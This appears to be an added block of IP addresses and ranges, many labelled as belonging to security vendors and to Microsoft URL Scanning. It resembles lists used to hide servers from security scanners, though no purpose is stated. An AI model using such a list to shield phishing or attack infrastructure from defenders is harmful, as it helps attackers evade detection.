+185.94.156.0/24 # ESET, spol. s r.o. +185.94.156.0/24 # ESET, spol. s r.o.Slovakia +185.94.157.0/24 # ESET, spol. s r.o.Slovakia +185.94.158.0/24 # ESET, spol. s r.o.Slovakia +185.94.159.0/24 # ESET, spol. s r.o. +185.94.159.0/24 # ESET, spol. s r.o.Slovakia +186.120.225.119 +187.20.55.95 +188.116.11.181 +188.143.42.27 +188.166.127.251 +188.214.104.146 +188.235.14.159 +188.235.37.42 +18.85.22.204 +189.207.179.80 +189.84.21.44 +190.10.8.50 +190.210.98.90 +191.232.0.0/16 +191.233.0.0/16 +191.234.0.0/16 +191.235.0.0/16 +191.236.0.0/16 +191.237.0.0/16 +191.238.0.0/16 +191.239.0.0/16 +191.34.129.22 +191.96.249.110 +192.132.210.0/24 # Forcepoint, LLC +192.150.187.46 +192.151.178.0/24 # SurfControl +192.151.179.0/24 # SurfControl +192.151.180.0/24 # SurfControl +192.151.181.0/24 # SurfControl +192.160.102.164 +192.160.102.165 +192.160.102.166 +192.160.102.168 +192.160.102.169 +192.160.102.170 +192.195.80.10 +192.241.79.178 +192.243.113.200 +192.34.80.176 +192.36.27.4 +192.36.27.6 +192.36.27.7 +192.42.115.102 +192.42.116.16 +192.81.131.49 +192.92.94.0/24 # Symantec LimitedIreland +192.94.206.0/24 # ESET LLC +193.107.85.56 +193.107.85.57 +193.110.108.0/23 # F-Secure Oyj +193.110.157.151 +193.149.0.0/16 +193.15.16.4 +193.164.131.95 +193.171.202.150 +193.201.225.45 +193.233.60.154 +193.70.39.41 +193.7.204.0/24 +193.7.207.0/24 +193.90.12.115 +193.90.12.116 +193.90.12.117 +193.90.12.118 +193.90.12.119 +194.104.108.0/24 +194.104.111.0/24 +194.218.3.79 +194.29.32.0/20 # Check Point Software Technologies LTDIsrael +194.29.32.0/24 # Check Point Software Technologies LTD +194.29.32.0/24 # Check Point Software Technologies LTDIsrael +194.54.162.212 +194.88.143.66 +195.130.217.0/24 +195.189.155.0/24 +195.189.155.0/24 # Bitdefender SRL +195.189.155.0/24 # Bitdefender SRLRomania +195.210.4.0/23 # Bitdefender SRL +195.210.4.0/23 # Bitdefender SRLRomania +195.219.163.68 +195.219.166.53 +195.22.126.177 +195.22.126.178 +195.228.45.176 +195.254.135.76 +195.74.76.0/24 # AVAST Software s.r.o. +195.74.76.0/24 # AVAST Software s.r.o.Czech Republic +196.216.238.0/24 # Forcepoint MauritiusSouth Africa +196.41.123.180 +196.52.48.49 +196.54.55.14 +197.231.221.211 +198.100.148.112 +198.167.223.38 +198.211.122.191 +198.245.60.8 +198.35.20.0/24 # Barracuda Networks, Inc. +198.35.21.0/24 # Barracuda Networks, Inc. +198.46.138.18 +198.50.159.155 +198.50.159.204 +198.50.200.129 +198.50.200.131 +198.50.200.134 +198.50.200.135 +198.50.200.147 +198.58.100.240 +198.58.107.53 +198.6.32.0/20 +198.6.32.0/24 +198.6.34.0/24 +198.6.44.0/23 +198.6.48.0/24 +198.6.62.0/24 +198.73.50.71 +198.96.155.3 +199.116.168.0/21 +199.127.226.150 +199.167.52.0/24 +199.167.52.0/24 # Palo Alto Networks +199.167.53.0/24 +199.167.53.0/24 # Palo Alto Networks +199.167.54.0/24 # Palo Alto networks +199.167.54.0/24 # Palo Alto Networks +199.167.55.0/24 +199.168.148.0/24 # Zscaler +199.168.149.0/24 # Zscaler +199.168.150.0/24 # Zscaler +199.168.151.0/24 # Zscaler +199.247.32.0/20 # Symantec Corporation +199.249.223.40 +199.249.223.41 +199.249.223.42 +199.249.223.43 +199.249.223.44 +199.249.223.45 +199.249.223.46 +199.249.223.47 +199.249.223.48 +199.249.223.49 +199.249.223.60 +199.249.223.61 +199.249.223.62 +199.249.223.63 +199.249.223.64 +199.249.223.65 +199.249.223.66 +199.249.223.67 +199.249.223.68 +199.249.223.69 +199.249.223.71 +199.249.223.72 +199.249.223.73 +199.249.223.74 +199.249.223.75 +199.249.223.76 +199.249.223.77 +199.249.223.78 +199.249.223.79 +199.249.223.81 +199.249.224.40 +199.249.224.41 +199.249.224.42 +199.249.224.43 +199.249.224.44 +199.249.224.45 +199.249.224.46 +199.249.224.47 +199.249.224.48 +199.249.224.49 +199.249.224.60 +199.249.224.61 +199.249.224.62 +199.249.224.63 +199.249.224.64 +199.249.224.65 +199.249.224.66 +199.249.224.67 +199.249.224.68 +199.249.224.69 +199.254.238.0/24 +199.30.0.0/16 +199.30.228.0/22 +199.68.196.124 +199.87.154.255 +20.184.0.0/16 +20.185.0.0/16 +20.186.0.0/16 +20.187.0.0/16 +20.188.0.0/16 +20.189.0.0/16 +20.190.0.0/16 +20.191.0.0/16 +202.126.13.0/24 +202.189.133.0/24 +202.3.185.0/24 # Trend Micro Incorporated. +202.3.185.0/24 # Trend Micro Incorporated.Taiwan +20.36.0.0/16 +20.37.0.0/16 +20.38.0.0/16 +203.83.0.0/16 +203.88.136.199 +20.39.0.0/16 +20.40.0.0/16 +20.41.0.0/16 +204.11.50.131 +204.118.31.0/24 # SONICWALL +204.13.200.0/22 +204.141.92.0/24 +204.156.124.0/22 # Barracuda CanadaCanada +204.15.64.0/23 # Forcepoint, LLC +204.15.66.0/24 # Forcepoint, LLC +204.15.67.0/24 # Forcepoint, LLC +204.15.68.0/24 # Forcepoint, LLC +204.15.69.0/24 # Forcepoint, LLC +204.15.71.0/24 # Forcepoint, LLC +204.180.153.0/24 # SonicWall +204.194.29.4 +20.42.0.0/16 +204.212.170.0/24 # SonicWall +204.231.0.0/16 +204.236.0.0/16 +204.246.0.0/16 +20.43.0.0/16 +20.44.0.0/16 +204.8.156.142 +204.85.191.30 +204.85.191.31 +205.139.110.0/23 +205.166.94.153 +205.168.84.133 +205.251.0.0/16 +206.165.76.0/24 +206.47.132.0/24 # Fortinet Technologies (Canada)Canada +206.47.184.0/24 # Fortinet Technologies (Canada)Canada +206.55.74.0 +207.102.138.0/24 +207.154.238.204 +207.171.0.0/16 +207.211.30.0/24 +207.211.31.0/24 +207.244.70.35 +207.46.0.0/16 +207.47.45.0/24 # Nextweb, Inc +207.68.0.0/16 +207.82.80.0/24 +208.127.0.0/17 # Palo Alto Networks +208.127.128.0/18 # Palo Alto Networks +208.127.200.0/24 # Palo Alto Networks +208.127.224.0/21 # Palo Alto Networks +208.127.240.0/21 # Palo Alto Networks +208.184.7.0/24 +208.67.1.79 +208.67.1.83 +208.80.192.0/21 +208.80.192.0/21 # Forcepoint, LLC +208.80.198.0/24 # Forcepoint, LLC +208.84.65.0/24 +208.84.66.0/24 +208.86.202.0/24 +208.86.203.0/24 +208.87.232.0/21 +208.87.232.0/24 +208.87.232.0/24 # SurfControl +208.87.233.0/24 # SurfControl +208.87.234.0/24 # SurfControl +208.87.235.0/24 # SurfControl +208.87.236.0/24 # SurfControl +208.87.237.0/24 # SurfControl +208.87.238.0/24 # SurfControl +208.87.239.0/24 # SurfControl +208.90.236.0/22 +208.91.112.0/22 +208.91.112.0/22 # Fortinet Inc. +208.91.112.0/23 +208.91.112.0/24 # Fortinet Inc. +208.91.113.0/24 # Fortinet Inc. +208.91.114.0/23 +208.91.114.0/23 # Fortinet Inc. +208.91.115.0/24 # +208.94.110.37 +209.123.234.23 +209.194.169.0/24 # +209.222.81.0/24 # +209.222.82.0/24 # Barracuda Networks, Inc. +209.222.83.0/24 # Barracuda Networks, Inc. +209.222.87.0/24 # Barracuda Networks, Inc. +209.240.0.0/16 +209.87.208.0/24 # Check Point Software Technologies, Inc. +209.87.209.0/24 # Check Point Software Technologies, Inc. +209.87.210.0/24 # Check Point Software Technologies, Inc. +209.87.211.0/24 # Check Point Software Technologies, Inc. +209.87.212.0/24 # Check Point Software Technologies, Inc. +209.87.214.0/24 # Check Point Software Technologies, Inc. +209.87.215.0/24 # Check Point Software Technologies, Inc. +209.87.216.0/22 # Check Point Software Technologies, Inc. +209.87.220.0/24 # Check Point Software Technologies, Inc. +209.87.221.0/24 # Check Point Software Technologies, Inc. +209.87.222.0/24 # Check Point Software Technologies, Inc. +209.97.112.0/20 # Check Point Software Technologies, Inc. +210.3.102.152 +210.50.9.88 +211.21.48.217 +212.16.104.33 +212.19.17.213 +212.21.66.6 +212.47.229.60 +212.47.239.73 +212.47.243.140 +212.47.246.21 +212.81.199.159 +212.83.40.239 +212.92.219.15 +213.108.105.71 +213.108.105.92 +213.152.228.0/24 # zScaler +213.152.228.0/24 # Zscaler +213.199.0.0/16 +213.61.149.100 +213.95.21.54 +216.10.192.0/20 +216.10.193.0/24 +216.104.16.0/20 # TREND MICRO INCORPORATED +216.104.16.0/24 # TREND MICRO INCORPORATED +216.137.0.0/16 +216.145.219.0/24 +216.145.221.0/24 +216.182.0.0/16 +216.205.24.0/24 +216.218.134.12 +216.218.222.11 +216.218.222.12 +216.228.144.0/24 # Check Point Software Technologies, Inc. +216.228.145.0/24 # Check Point Software Technologies, Inc. +216.228.146.0/24 # Check Point Software Technologies, Inc. +216.228.147.0/24 # Check Point Software Technologies, Inc. +216.228.148.0/24 # Check Point Software Technologies, Inc. +216.228.149.0/24 # Check Point Software Technologies, Inc. +216.228.150.0/24 # Check Point Software Technologies, Inc. +216.228.151.0/24 # Check Point Software Technologies, Inc. +216.228.152.0/24 # Check Point Software Technologies, Inc. +216.228.153.0/24 # Check Point Software Technologies, Inc. +216.228.154.0/24 # Check Point Software Technologies, Inc. +216.228.155.0/24 # Check Point Software Technologies, Inc. +216.228.156.0/24 # Check Point Software Technologies, Inc. +216.228.157.0/24 # Check Point Software Technologies, Inc. +216.228.158.0/24 # Check Point Software Technologies, Inc. +216.228.159.0/24 # Check Point Software Technologies, Inc. +216.239.90.19 +216.35.243.0/24 +216.35.244.0/24 +216.82.240.0/22 +216.82.246.0/24 +216.82.248.0/22 +216.82.252.0/22 +216.82.253.0/22 +216.82.254.0/22 +216.99.128.0/20 # TREND MICRO INCORPORATED +217.115.10.131 +217.170.197.83 +217.182.207.27 +217.182.74.253 +217.182.76.240 +217.182.78.177 +217.197.81.19 +220.227.48.213 +222.110.3.1 +223.26.48.248 +2.238.18.141 +23.100.0.0/16 +23.101.0.0/16 +23.102.0.0/16 +23.103.0.0/16 +23.129.64.11 +23.129.64.12 +23.129.64.13 +23.129.64.14 +23.129.64.15 +23.20.0.0/16 +23.239.28.127 +23.249.49.0/24 +23.249.50.0/24 +23.249.51.0/24 +23.249.52.0/24 +23.249.53.0/24 +23.249.54.0/24 +23.249.55.0/24 +23.83.238.245 +23.92.27.23 +23.92.28.23 +23.96.0.0/16 +23.97.0.0/16 +23.98.0.0/16 +23.99.0.0/16 +24.207.212.154 +24.27.178.106 +27.0.0.0/16 +3.0.0.0/16 +3.112.0.0/16 +31.179.151.198 +31.185.104.19 +31.185.104.20 +31.185.104.21 +31.185.27.208 +3.120.0.0/16 +31.220.111.120 +3.16.0.0/16 +3.40.0.0/16 +35.153.0.0/16 +35.154.0.0/15 +35.156.0.0/14 +35.160.0.0/12 +35.176.0.0/14 +35.180.0.0/15 +35.182.0.0/16 +35.184.106.64 +35.193.100.176 +36.227.161.175 +37.139.8.104 +37.156.184.0/23 # AVAST Software s.r.o. +37.156.184.0/23 # AVAST Software s.r.o.Czech Republic +37.156.184.0/24 # Czech Republic +37.156.185.0/24 # Czech Republic +37.156.187.0/24 # Czech Republic +37.187.129.166 +37.187.53.94 +37.187.7.74 +37.218.240.21 +37.218.240.50 +37.218.240.68 +37.218.240.80 +37.220.35.202 +37.220.36.240 +37.48.120.196 +37.59.101.176 +37.59.112.7 +37.59.116.170 +37.59.119.196 +37.97.228.159 +3.80.0.0/16 +3.8.0.0/16 +3.82.0.0/16 +3.89.0.0/16 +40.112.0.0/16 +40.113.0.0/16 +40.114.0.0/16 +40.115.0.0/16 +40.116.0.0/16 +40.117.0.0/16 +40.118.0.0/16 +40.119.0.0/16 +40.121.0.0/16 +40.122.0.0/16 +40.123.0.0/16 +40.124.0.0/16 +40.125.0.0/16 +40.126.0.0/16 +40.127.0.0/16 +40.64.0.0/16 +40.65.0.0/16 +40.66.0.0/16 +40.67.0.0/16 +40.68.0.0/16 +40.69.0.0/16 +40.70.0.0/16 +40.71.0.0/16 +40.74.0.0/16 +40.75.0.0/16 +40.76.0.0/16 +40.77.0.0/16 +40.78.0.0/16 +40.79.0.0/16 +40.80.0.0/16 +40.81.0.0/16 +40.82.0.0/16 +40.83.0.0/16 +40.84.0.0/16 +40.85.0.0/16 +40.86.0.0/16 +40.87.0.0/16 +40.88.0.0/16 +40.89.0.0/16 +40.90.0.0/16 +40.91.0.0/16 +41.100.127.24 +41.100.95.92 +41.103.213.190 +41.206.188.206 +41.74.192.0/21 +41.74.200.0/23 +41.74.202.0/24 +41.74.203.0/24 +41.74.204.0/22 +41.78.128.113 +45.33.23.23 +45.33.48.204 +45.35.72.85 +45.62.236.66 +45.62.251.245 +45.76.115.159 +45.79.137.11 +45.79.144.222 +45.79.198.115 +45.79.208.219 +45.79.73.22 +45.79.85.112 +46.101.127.145 +46.101.139.248 +46.101.150.49 +46.101.164.37 +46.137.0.0/16 +46.165.230.5 +46.165.254.166 +46.17.97.112 +46.182.106.190 +46.182.18.214 +46.182.18.40 +46.182.18.46 +46.182.19.15 +46.182.19.219 +46.183.218.199 +46.194.136.3 +46.194.23.204 +46.226.108.26 +46.228.128.0/23 # F-Secure OYj +46.228.128.0/23 # F-Secure OYjFinland +46.228.129.0/24 # F-Secure OYjFinland +46.228.130.0/23 # F-Secure OYjFinland +46.228.132.0/23 # F-Secure OYjFinland +46.228.134.0/23 # F-Secure OYjFinland +46.228.136.0/23 # F-Secure OYjFinland +46.228.140.0/23 # F-Secure OYjFinland +46.228.143.0/24 # F-Secure OyjFinland +46.233.0.70 +46.235.227.70 +46.246.35.71 +46.246.35.72 +46.246.35.81 +46.246.49.100 +46.246.49.106 +46.246.49.186 +46.29.248.238 +46.4.55.177 +46.4.77.210 +46.4.81.178 +46.51.0.0/16 +46.72.103.95 +46.72.118.182 +46.72.66.220 +46.72.77.67 +46.98.198.16 +46.98.198.232 +46.98.199.228 +46.98.199.45 +46.98.200.204 +46.98.201.202 +46.98.205.117 +46.98.205.60 +46.98.206.9 +46.98.207.186 +49.50.108.240 +50.112.0.0/16 +50.16.0.0/16 +50.18.0.0/16 +50.19.0.0/16 +50.237.243.0/24 # +50.247.195.124 +50.76.159.218 +51.104.0.0/16 +51.105.0.0/16 +51.136.0.0/16 +51.137.0.0/16 +51.140.0.0/16 +51.141.0.0/16 +51.142.0.0/16 +51.143.0.0/16 +51.144.0.0/16 +51.145.0.0/16 +51.15.134.120 +51.15.141.220 +51.15.196.158 +51.15.199.104 +51.15.212.104 +51.15.217.56 +51.15.34.210 +51.15.34.214 +51.15.40.233 +51.15.43.205 +51.15.43.232 +51.15.44.197 +51.15.45.97 +51.15.46.115 +51.15.46.49 +51.15.50.133 +51.15.53.118 +51.15.53.83 +51.15.54.136 +51.15.56.11 +51.15.57.177 +51.15.57.79 +51.15.60.255 +51.15.60.62 +51.15.62.146 +51.15.63.229 +51.15.63.98 +51.15.64.212 +51.15.70.13 +51.15.70.226 +51.15.70.228 +51.15.71.118 +51.15.72.53 +51.15.73.182 +51.15.76.81 +51.15.79.107 +51.15.8.100 +51.15.84.183 +51.15.87.157 +51.163.158.0/23 +51.255.202.66 +5.164.205.245 +5.165.66.7 +5.165.79.216 +5.188.11.165 +5.189.146.133 +5.189.188.111 +5.196.0.149 +5.196.1.129 +5.196.121.161 +5.196.29.217 +5.196.66.162 +5.199.130.188 +5.254.112.154 +5.254.79.66 +5.39.217.14 +54.36.81.57 +5.45.56.0/24 # AVAST Software s.r.o.Czech Republic +5.45.57.0/24 # AVAST Software s.r.o.Czech Republic +5.45.58.0/24 # AVAST Software s.r.o.Czech Republic +5.45.59.0/24 # AVAST Software s.r.o.Czech Republic +5.45.62.0/24 # AVAST Software s.r.o.Czech Republic +5.45.63.0/24 # AVAST Software s.r.o. +5.45.63.0/24 # AVAST Software s.r.o.Czech Republic +5.56.214.118 +5.62.17.0/24 # AVAST cloud +5.62.21.0/24 # AVAST Software s.r.o. +5.62.30.0/24 # AVAST Software s.r.o. +5.62.32.0/24 # Avast Software +5.62.33.0/24 # AVAST Software s.r.o. +5.62.34.0/24 # AVAST Software s.r.o. +5.62.35.0/24 # AVAST Software s.r.o. +5.62.36.0/23 # AVAST Software s.r.o. +5.62.38.0/24 # AVAST Software s.r.o. +5.62.39.0/24 # AVAST Software s.r.o. +5.62.42.0/23 # AVAST Software s.r.o. +5.62.44.0/23 # AVAST Software s.r.o. +5.62.46.0/23 # AVAST Software s.r.o. +5.62.46.0/24 # AVAST Software s.r.o. +5.62.47.0/24 # AVAST Software s.r.o. +5.62.48.0/23 # AVAST Software s.r.o. +5.62.50.0/24 # +5.62.52.0/24 # AVAST Software s.r.o. +5.62.53.0/24 # AVAST Software s.r.o. +5.62.54.0/24 # +5.62.55.0/24 # AVAST Software s.r.o. +5.62.56.0/23 # AVAST Software s.r.o. +5.62.56.0/24 # AVAST Software s.r.o. +5.62.57.0/24 # AVAST Software s.r.o. +5.62.58.0/23 # AVAST Software s.r.o. +5.62.60.0/23 # AVAST Software s.r.o. +5.62.62.0/23 # AVAST Software s.r.o. +59.127.163.155 +5.9.195.140 +60.248.162.179 +61.228.92.249 +62.102.148.67 +62.12.115.107 +62.133.130.105 +62.140.10.0/24 +62.140.7.0/24 +62.141.39.47 +62.149.12.153 +62.176.4.10 +62.198.32.223 +62.210.105.116 +62.210.105.86 +62.210.129.246 +62.210.37.82 +62.212.73.141 +62.219.3.47 +62.219.3.48 +62.235.222.192 +63.128.21.0/24 +63.137.229.0/24 # Fortinet Inc +63.245.192.0/23 +63.245.204.0/24 +63.245.205.0/24 +63.245.206.0/24 +63.251.166.0/24 # Watchguard Technologies Inc +63.32.0.0/16 +64.113.32.29 +64.124.32.84 +64.137.162.142 +64.137.205.124 +64.137.210.30 +64.215.22.0/24 # Zscaler +64.215.22.0/24 # ZSCALER +64.235.144.0/24 +64.235.148.0/23 # Barracuda Networks, Inc. +64.235.150.0/24 # Barracuda Networks, Inc. +64.235.151.0/24 # Barracuda Networks, Inc. +64.235.153.0/24 # Barracuda Networks, Inc. +64.235.155.0/24 # +64.235.158.0/24 # Barracuda Networks, Inc. +64.252.0.0/16 +64.27.17.140 +64.4.0.0/16 +64.64.96.0/24 # Avast +64.70.67.0/24 # Symantec Corporation +64.70.94.0/24 # Symantec Corporation +64.74.215.0/24 +64.94.121.0/24 +65.129.144.43 +65.154.226.0/24 +65.154.226.0/24 # PALO ALTO NETWORKS +65.155.38.0/24 # PALO ALTO NETWORKS +65.181.123.254 +65.19.167.130 +65.19.167.131 +65.19.167.132 +65.197.254.0/24 +65.201.134.0/24 +65.52.0.0/16 +65.54.0.0/16 +65.55.0.0/16 +66.110.216.10 +66.155.4.213 +66.159.192.0/19 # Palo Alto Networks +66.180.193.219 +66.180.80.0/20 # TREND MICRO INCORPORATED +66.220.3.179 +66.232.32.0/24 # Palo Alto Networks +66.232.33.0/24 # Palo Alto Networks +66.232.34.0/24 # Palo Alto Networks +66.232.35.0/24 # Palo Alto Networks +66.232.36.0/24 # Palo Alto Networks +66.232.37.0/24 # Palo Alto Networks +66.232.38.0/24 # Palo Alto Networks +66.232.39.0/24 # Palo Alto Networks +66.232.40.0/24 # Palo Alto Networks +66.232.41.0/24 # Palo Alto Networks +66.232.42.0/24 # Palo Alto Networks +66.232.43.0/24 # Palo Alto Networks +66.232.44.0/24 # Palo Alto Networks +66.232.45.0/24 # Palo Alto Networks +66.232.46.0/24 # Palo Alto Networks +66.232.47.0/24 # Palo Alto Networks +66.35.16.0/20 # Fortinet Inc. +66.35.16.0/24 # Fortinet Inc. +66.35.19.0/24 # Fortinet Inc. +66.93.208.240/28 +67.115.118.0/24 # SonicWallsInc +67.202.0.0/16 +67.205.146.164 +67.215.255.140 +67.219.240.0/23 +67.219.242.0/23 +67.219.244.0/23 +67.219.246.0/23 +67.219.248.0/23 +67.219.250.0/23 +67.219.252.0/23 +67.231.144.0/24 +67.231.145.0/24 +67.231.146.0/24 +67.231.147.0/24 +67.231.148.0/24 +67.231.149.0/24 +67.231.151.0/24 +67.231.158.0/24 +69.162.107.5 +69.164.207.234 +69.94.64.0/24 # Czech Republic +69.94.66.0/24 # AVAST Software s.r.o.Czech Republic +69.94.67.0/24 # AVAST Software s.r.o.Czech Republic +69.94.68.0/24 # AVAST Software s.r.o.Czech Republic +69.94.69.0/24 # AVAST Software s.r.o.Czech Republic +69.94.70.0/24 # AVAST Software s.r.o.Czech Republic +69.94.72.0/23 # AVAST Software s.r.o.Czech Republic +69.94.74.0/23 # AVAST Software s.r.o.Czech Republic +69.94.74.0/24 # AVAST Software s.r.o.Czech Republic +69.94.75.0/24 # AVAST Software s.r.o.Czech Republic +69.94.76.0/24 # AVAST Software s.r.o.Czech Republic +69.94.77.0/24 # AVAST Software s.r.o.Czech Republic +69.94.78.0/24 # AVAST Software s.r.o.Czech Republic +69.94.79.0/24 # AVAST Software s.r.o.Czech Republic +70.132.0.0/16 +70.37.0.0/16 +70.39.159.0/24 # Zscaler +70.39.159.0/24 # ZSCALER +70.42.131.0/24 +71.152.0.0/16 +71.46.220.68 +72.12.207.14 +72.14.179.10 +72.14.182.209 +72.165.69.0/24 # Palo Alto Networks +72.165.69.0/24 # PALO ALTO NETWORKS +72.204.193.71 +72.21.0.0/16 +72.210.252.137 +72.221.196.141 +72.44.0.0/16 +72.5.231.0/24 +72.52.75.27 +72.5.65.0/24 +72.93.243.211 +74.142.74.156 +74.201.127.0/24 +74.217.90.0/24 +74.221.128.0/24 # Palo Alto Networks +74.221.129.0/24 # Palo Alto Networks +74.221.130.0/24 # Palo Alto Networks +74.221.131.0/24 # Palo Alto Networks +74.221.133.0/24 # Palo Alto Networks +74.221.137.0/24 # Palo Alto Networks +74.221.141.0/24 # Palo Alto Networks +74.252.14.154 +74.50.54.69 +75.101.0.0/16 +75.54.229.204 +77.191.12.176 +77.191.19.135 +77.191.24.100 +77.234.40.0/24 # AVAST Software s.r.o.Czech Republic +77.234.41.0/24 # AVAST Software s.r.o.Czech Republic +77.234.42.0/24 # AVAST Software s.r.o.Czech Republic +77.234.43.0/24 # AVAST Software s.r.o.Czech Republic +77.234.44.0/24 # AVAST Software s.r.o.Czech Republic +77.234.45.0/24 # AVAST Software s.r.o.Czech Republic +77.234.46.0/24 # AVAST Software s.r.o.Czech Republic +77.234.47.0/24 # AVAST Software s.r.o.Czech Republic +77.246.163.141 +77.247.181.162 +77.250.227.12 +77.40.129.123 +77.74.176.0/24 # Kaspersky Lab AO +77.74.176.0/24 # Kaspersky Lab AORussian Federation +77.74.177.0/24 # Kaspersky Lab AORussian Federation +77.74.178.0/23 # Kaspersky Lab AORussian Federation +77.74.180.0/22 # Kaspersky Lab AORussian Federation +77.74.181.0/24 # Kaspersky Lab AORussian Federation +77.74.183.0/24 # Kaspersky Lab AORussian Federation +77.81.107.138 +77.81.247.72 +78.107.237.16 +78.109.23.1 +78.129.137.28 +78.13.203.226 +78.13.238.7 +78.142.175.70 +78.21.52.58 +78.31.164.41 +78.46.50.7 +78.70.167.74 +78.84.240.48 +79.125.0.0/16 +79.137.79.167 +79.137.80.94 +79.172.193.32 +79.199.245.10 +79.199.255.156 +79.78.147.142 +79.79.148.81 +80.209.252.72 +80.241.60.207 +80.67.172.162 +80.73.242.142 +80.79.23.7 +80.82.67.166 +80.82.67.186 +80.85.84.23 +81.161.59.0/24 # Bitdefender SRL +81.161.59.0/24 # Bitdefender SRLRomania +81.171.19.32 +82.146.58.35 +82.165.100.196 +82.165.142.79 +82.202.184.0/24 # Kaspersky Lab AORussian Federation +82.202.185.0/24 # Kaspersky Lab AORussian Federation +82.202.188.0/24 # Kaspersky Lab AORussian Federation +82.202.189.0/24 # Kaspersky Lab AORussian Federation +82.202.190.0/24 # Kaspersky Lab AO +82.202.190.0/24 # Kaspersky Lab AORussian Federation +82.221.112.122 +82.221.128.217 +82.221.139.190 +82.221.139.25 +82.223.27.82 +82.247.198.227 +8.25.203.0/24 # Zscaler +8.25.203.0/24 # ZSCALER +83.134.133.198 +8.34.0.0/16 +8.34.34.0/24 # Zscaler +8.34.34.0/24 # ZSCALER +8.35.0.0/16 +8.35.35.0/24 # Zscaler +8.35.35.0/24 # ZSCALER +83.92.47.99 +84.105.18.164 +84.17.21.50 +84.190.181.254 +84.19.181.25 +84.200.50.18 +84.200.82.163 +84.209.48.106 +84.217.13.138 +84.3.10.87 +84.33.17.128/25 +84.42.239.35 +84.42.239.36 +84.48.199.78 +84.53.192.243 +84.53.225.118 +85.115.32.0/24 # Forcepoint Cloud Turkey +85.115.33.0/24 # Forcepoint Cloud Netherlands +85.115.34.0/24 # Forcepoint UK Preproduction network +85.115.35.0/24 # Forcepoint Cloud Poland +85.115.36.0/24 # Forcepoint Cloud South Africa +85.115.37.0/24 # Forcepoint Cloud Sweden +85.115.39.0/24 # Forcepoint Cloud Milan MILA +85.115.41.0/24 # Forcepoint Cloud Americas +85.115.42.0/24 # Forcepoint Cloud Americas +85.115.44.0/24 # Forcepoint Cloud Spain +85.115.45.0/24 # Forcepoint Cloud Norway +85.115.46.0/24 # Forcepoint Cloud Dubai +85.115.47.0/24 # +85.115.49.0/24 # Forcepoint Cloud London LONL +85.115.52.0/24 # Forcepoint Cloud London LONA +85.115.53.0/24 # Forcepoint Cloud London LONB +85.115.54.0/24 # Forcepoint Cloud London LONJ +85.115.56.0/24 # Forcepoint Cloud Germany +85.115.58.0/24 # Forcepoint Cloud Germany +85.115.60.0/24 +85.115.60.0/24 # Forcepoint Cloud France +85.115.61.0/24 # Forcepoint Cloud Belgium +85.115.62.0/24 # Forcepoint Cloud Switzerland +85.115.63.0/24 # Forcepoint Cloud Finland +85.195.107.250 +85.248.227.163 +85.248.227.165 +85.90.244.23 +85.93.218.204 +86.111.216.0/24 +86.111.216.0/24 # Forcepoint Cloud Ltd +86.111.218.0/23 # Forcepoint Cloud Ltd +86.111.222.0/24 # +86.111.223.0/24 # Forcepoint Cloud Ltd +86.149.159.224 +86.149.159.8 +87.118.115.176 +87.118.116.12 +87.118.116.90 +87.118.122.201 +87.118.122.254 +87.118.122.30 +87.118.122.50 +87.118.123.191 +87.118.82.3 +87.118.92.43 +87.118.94.2 +87.120.254.130 +87.180.235.230 +87.180.238.160 +87.180.239.118 +87.238.0.0/16 +87.81.148.61 +87.98.178.61 +88.198.125.96 +88.76.29.216 +88.77.195.36 +88.77.211.4 +88.83.40.246 +89.144.12.15 +89.163.155.202 +89.167.131.0/24 # Zscaler +89.167.131.0/24 # Zscaler inc. +89.187.150.12 +89.187.150.13 +89.187.150.14 +89.187.150.15 +89.207.129.150 +89.212.99.66 +89.234.157.254 +89.236.34.117 +89.248.166.157 +89.31.57.5 +89.31.96.168 +89.34.237.226 +89.38.150.0/24 +89.38.208.57 +89.45.226.28 +91.103.64.0/21 # Kaspersky Lab AORussian Federation +91.117.98.197 +91.121.52.156 +91.122.52.9 +91.134.232.48 +91.138.253.244 +91.146.121.3 +91.199.104.0/24 +91.199.104.0/24 # Bitdefender SRLRomania +91.212.136.0/24 +91.213.143.0/24 # AVAST Software s.r.o. +91.213.143.0/24 # AVAST Software s.r.o.Czech Republic +91.219.236.232 +91.219.237.244 +91.220.42.0/24 +91.221.57.129 +91.228.164.0/24 # ESET, spol. s r.o. +91.228.164.0/24 # ESET, spol. s r.o.Slovakia +91.228.165.0/24 # ESET, spol. s r.o.Slovakia +91.228.166.0/24 # ESET, spol. s r.o.Slovakia +91.228.167.0/24 # ESET, spol. s r.o.Slovakia +91.233.106.121 +91.233.117.81 +91.244.10.34 +91.90.128.0/20 # Check Point Software Technologies LTD +91.90.128.0/20 # Check Point Software Technologies LTDIsrael +92.111.156.14 +92.169.87.4 +92.222.207.227 +92.222.6.12 +92.222.74.226 +92.63.173.28 +92.87.236.230 +93.115.95.201 +93.115.95.202 +93.115.95.204 +93.115.95.205 +93.115.95.206 +93.115.95.207 +93.123.73.123 +93.159.224.0/23 # Russian Federation +93.159.226.0/24 # Russian Federation +93.159.227.0/24 # +93.159.228.0/23 # Kaspersky Lab InternetRussian Federation +93.159.230.0/23 # Kaspersky Lab InternetRussian Federation +93.174.93.133 +93.174.93.71 +93.188.162.188 +93.64.207.55 +93.88.74.140 +94.102.50.42 +94.130.28.151 +94.142.242.84 +94.156.77.83 +94.177.123.116 +94.198.100.17 +94.23.201.80 +94.23.239.44 +94.242.205.2 +94.242.57.161 +94.242.57.2 +94.245.0.0/16 +94.248.3.184 +94.248.36.241 +94.248.40.132 +94.34.7.140 +95.128.43.164 +95.130.11.170 +95.130.12.12 +95.130.9.210 +95.183.244.0/24 +95.211.118.194 +95.211.230.94 +95.215.44.194 +95.249.94.233 +95.45.252.0/29 +95.79.145.72 +96.127.0.0/16 +96.255.14.191 +96.45.32.0/20 +96.45.32.0/20 # Fortinet Inc. +96.45.32.0/21 +96.45.32.0/21 # Fortinet Inc. +96.45.33.0/24 # Fortinet Inc. +96.45.40.0/21 +96.45.40.0/21 # Fortinet Inc. +96.64.149.101 +97.74.237.196 +98.158.240.0/20 # Symantec Corporation +98.159.38.0/24 # Avast Software +98.174.90.43 +99.79.0.0/16 +99.80.0.0/16 +99.82.0.0/16 +99.84.0.0/16 +99.86.0.0/16 + +73.217.131.0/24 # Custom +102.37.0.0/16 # Custom + +23.103.132.0/22 # Microsoft URL Scanning +23.103.136.0/21 # Microsoft URL Scanning +23.103.144.0/20 # Microsoft URL Scanning +23.103.198.0/23 # Microsoft URL Scanning +23.103.200.0/22 # Microsoft URL Scanning +40.92.0.0/14 # Microsoft URL Scanning +40.107.0.0/17 # Microsoft URL Scanning +52.100.0.0/14 # Microsoft URL Scanning 